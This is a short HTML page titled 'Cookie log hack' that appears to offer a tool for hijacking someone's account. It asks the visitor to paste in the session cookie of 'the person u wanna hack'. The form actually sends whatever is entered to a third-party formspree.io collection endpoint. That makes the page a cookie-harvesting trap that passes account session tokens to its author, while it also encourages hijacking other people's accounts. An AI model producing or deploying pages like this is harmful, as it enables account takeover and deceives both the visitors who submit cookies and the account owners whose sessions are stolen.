<!DOCTYPE html>
<html lang="en">
<head>
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cookie log hack</title>
    <style>
        body {
            background-color: #333;
            color: #fff;
            font-family: Arial, sans-serif;
            text-align: center;
            padding: 50px;
            margin: 0;
        }

        .data-form {
            max-width: 400px;
            margin: auto;
            background-color: rgba(50, 50, 50, 0.9);
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.5);
        }

        .input-group {
            margin-bottom: 20px;
        }

        label {
            display: block;
            margin-bottom: 5px;
        }

        input {
            width: 100%;
            padding: 10px;
            box-sizing: border-box;
            border: 1px solid #ccc;
            border-radius: 5px;
        }

        button {
            background-color: #4CAF50;
            color: white;
            border: none;
            padding: 10px 15px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 14px;
            cursor: pointer;
            border-radius: 5px;
        }
    </style>
</head>
<body>

<div class="data-form">
    <h2>type cookie of person u wanna hack </h2>
    <form action="https://formspree.io/f/mgegyqqg" method="POST">
        <div class="input-group">
            <label for="Cookie">Cookie:</label>
            <input type="text" id="Cookie" name="Cookie" required>
        </div>
        <button type="submit">submit</button>
    </form>
</div>

<script>
</script>

</body>
</html>